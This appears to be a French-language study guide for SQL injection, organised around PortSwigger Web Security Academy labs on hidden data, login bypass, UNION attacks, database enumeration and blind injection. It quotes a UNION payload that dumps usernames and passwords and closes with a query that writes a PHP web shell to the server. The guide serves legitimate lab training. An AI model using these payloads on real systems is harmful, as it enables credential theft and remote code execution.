<img src="sqli.png">


**Tout sur SQLi**
Une variation de requettes SQL selon la DB: [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)

# Retrieving hidden data
<details><summary>></summary>

C'est la partie de SQLi qui permet d'extraire des données auxquelles vous n'avez pas accès, c'est la sqli de base.

Lien portswigger: [portswigger-retrieving-hidden-data](https://portswigger.net/web-security/sql-injection#retrieving-hidden-data) 

Lab et Solution: [portswigger-retrieving-hidden-data-lab](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
</details>

# Subverting application logic
<details><summary>></summary>

Abus de la logique de l'app. C'est la partie permettant de changer la logique de l'app comme les login bypass.

Lien portswigger: [portswigger-subverting-application-logic](https://portswigger.net/web-security/sql-injection#subverting-application-logic)

Lab et Solution: [portswigger-subverting-application-logic-lab](https://portswigger.net/web-security/sql-injection/lab-login-bypass)

</details>

# Retrieving data from other database tables (UNION attacks)
<details><summary>></summary>

UNION attacks est le type de SQLi le plus interessant. Cette attaque permet de lire des données d'autres tables de la base de données.

Lien portswigger: [portswigger-union-attacks](https://portswigger.net/web-security/sql-injection/union-attacks)

Lab et Solution: [lab1-determining the number of columns returned by the query](https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns)

Lab et Solution: [lab2-finding a column containing text](https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text)

Lab et Solution: [lab3-retrieving data from other tables](https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables)


**Retrieving multiple values within a single column**

In the preceding example, suppose instead that the query only returns a single column.

You can easily retrieve multiple values together within this single column by concatenating the values together, ideally including a suitable separator to let you distinguish the combined values. For example, on Oracle you could submit the input:

`' UNION SELECT username || '~' || password FROM users--`

This uses the double-pipe sequence || which is a string concatenation operator on Oracle. The injected query concatenates together the values of the username and password fields, separated by the ~ character.

The results from the query will let you read all of the usernames and passwords, for example:


    administrator~s3cure
    wiener~peter
    carlos~montoya


Lab et Solution: [lab4- retrieving multiple values in a single column](https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column)


</details>

# Examining the database in SQL injection attacks

<details><summary>></summary>

Aprés avoir déterminé la vuln il faut faire une analyse de la DB pour savoir comment procéder. Cette partir vous permet de savoir quel SGBD utilise la DB, les tables ...

Lien portswigger: [portswigger-examining-the-database](https://portswigger.net/web-security/sql-injection/examining-the-database)

Lab et Solution: [lab1-querying the database type and version on Oracle](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle)

Lab et Solution: [lab2-querying the database type and version on MySQL and Microsoft](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft)

Lab et Solution: [lab3-isting the database contents on non-Oracle databases](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle)

Lab et Solution: [lab4- listing the database contents on Oracle](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle)


</details>

# Blind SQL injection

<details><summary>></summary>

C'est l'exploitation la plus difficile et non-facile à detecter.

Lien portswigger: [portswigger-sql-injection/blind](https://portswigger.net/web-security/sql-injection/blind)

Lab et Solution: [lab1-Blind SQL injection with conditional responses](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)

**Error-based SQL injection**

Lab et Solution: [lab2-Blind SQL injection with conditional errors](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors)

**Extracting sensitive data via verbose SQL error messages**

Lab et Solution: [lab3-Visible error-based SQL injection](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based)

**Exploiting blind SQL injection by triggering time delays**

Lab et Solution: [lab4-Blind SQL injection with time delays](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays)

Lab et Solution: [lab5-Blind SQL injection with time delays and information retrieval](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval)

**Exploiting blind SQL injection using out-of-band (OAST) techniques**

Lab et Solution: [lab6-Blind SQL injection with out-of-band interaction](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band)

Lab et Solution: [lab7-Blind SQL injection with out-of-band data exfiltration](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration)

Lab et Solution:

</details>

# Upload shell ( SQLi to RCE)
<details><summary>></summary>

    select user_role, address, phone_number from users where username=”attacker” union all select "<?
    system($_GET['cmd’]); ?>",2, into outfile "D:/path/shell.php”--

</details>



